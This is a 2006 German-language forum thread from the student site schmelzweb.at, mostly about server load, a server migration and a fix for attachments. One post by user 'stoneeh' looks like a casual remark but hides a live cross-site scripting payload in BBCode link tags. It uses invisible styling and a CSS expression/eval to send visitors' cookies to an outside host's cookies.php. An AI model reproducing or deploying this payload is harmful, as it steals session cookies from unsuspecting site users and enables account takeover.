Schmelzweb.at
Unbeantwortete Themen
Aktive Themen
Aktuelle Zeit: Do 15. Nov 2018, 10:11

Autor Nachricht
step
Beitrag  Betreff des Beitrags:   |  Verfasst: Do 4. Mai 2006, 11:44
Benutzer

gerald hat geschrieben:
PS: ist aber nicht nur fürs schmelzweb.. der server gelle????

korrekt, jedoch: der datenverkehr kommt zu 85% vom schmelzweb, und zu 15% von den anderen dingen die auf dem server laufen. bei der CPU-auslastung usw. kann man das nicht so exakt trennen (weil man zb nicht sagen kann, ob der apache-server wegen der schmelzweb- oder anderer seiten so viel speicher braucht), das verhältnis wird aber relativ ähnlich sein.

wen's interessiert:
auf dem server ist noch meine private homepage, und die von ein paar freunden, und ein bildarchiv. letzteres okkupiert zwar den löwenanteil an plattenplatz, aufgrund der deutlich geringeren zugriffe (im vergleich zum schmelzweb) fallen aber alle diese webseiten im datenverkehr praktisch nicht auf.
was andere services wie email angeht, ist abermals die STRV mit ihrem mailverteiler spitzenreiter.. aufgrund der sichtbarkeit dieser email-adresse (strv@schmelzweb.at) ist sie das hauptziel von spam- und virus-emails, die auf diesem server einlangen.

stoneeh
Beitrag  Betreff des Beitrags:   |  Verfasst: Do 4. Mai 2006, 17:01
Benutzer

also ich find den server schnell genug
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://pasching2k4.pa.funpic.de/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'

gerald
Beitrag  Betreff des Beitrags:   |  Verfasst: Do 4. Mai 2006, 17:25
Benutzer

gg..

Tja also nicht nur step ist fleissig sondern die ganzen mails aus dem strv@schmelzweb verteiler wollen auch beantwortet werden

Mir persönlich ist der server auch schnell genug aber ich verstehe step
Leistung kann man immer brauchen!
..

PS @ step: hast noch lange haare?

step
Beitrag  Betreff des Beitrags:   |  Verfasst: Do 11. Mai 2006, 00:37
Benutzer

stoneeh hat geschrieben:
also ich find den server schnell genug

ja, upgrades sollte man ja auch machen bevor alles ächzt und raucht ...

übrigens - wer diese nachricht liest, tut's schon auf dem neuen server! bis alles wieder komplett steht könnte es zwar noch ein weilchen dauern, aber an sich sollte der schwierigste teil der transplantation erledigt sein.

step
Beitrag  Betreff des Beitrags:   |  Verfasst: Do 11. Mai 2006, 00:40
Benutzer

gerald hat geschrieben:
gg..

Tja also nicht nur step ist fleissig sondern die ganzen mails aus dem strv@schmelzweb verteiler wollen auch beantwortet werden

stimmt.. das gehört auch einmal gesagt... während ich mich eher im hintergrund um die technischen dinge kümmere gibt's ja eine menge leute, die inhaltlich eine super arbeit leisten! also ein riesen DANKE meinen kollegen von der STRV und den anderen moderatoren hier im schmelzweb, dass sie mir den rücken freihalten ...gemeinsam sind wir stark...

Zitat:
PS @ step: hast noch lange haare?

ja, leider gehts mit der diss halt doch nicht so flott voran wie ich's gerne hätte.. aber wie's aussieht ist ein ende abzusehen...

step
Beitrag  Betreff des Beitrags:   |  Verfasst: Do 11. Mai 2006, 03:59
Benutzer

ok, bis auf die attachments (die man zwar anhängen kann, aber aus einem mir völlig schleierhaften grund nicht angezeigt werden) und ein paar kosmetische details dürfte alles geklappt haben...

der rest folgt dann morgen - ich hoffe ihr könnt so lange ohne attachments & downloads auskommen, ohne dass die welt zusammenbricht ;)

step
Beitrag  Betreff des Beitrags:   |  Verfasst: Do 11. Mai 2006, 09:57
Benutzer

so --- noch bevor die meisten sportstudenten aufgestanden sind ist auch das attachment-problem gelöst! ;)

lg
step

Druckansicht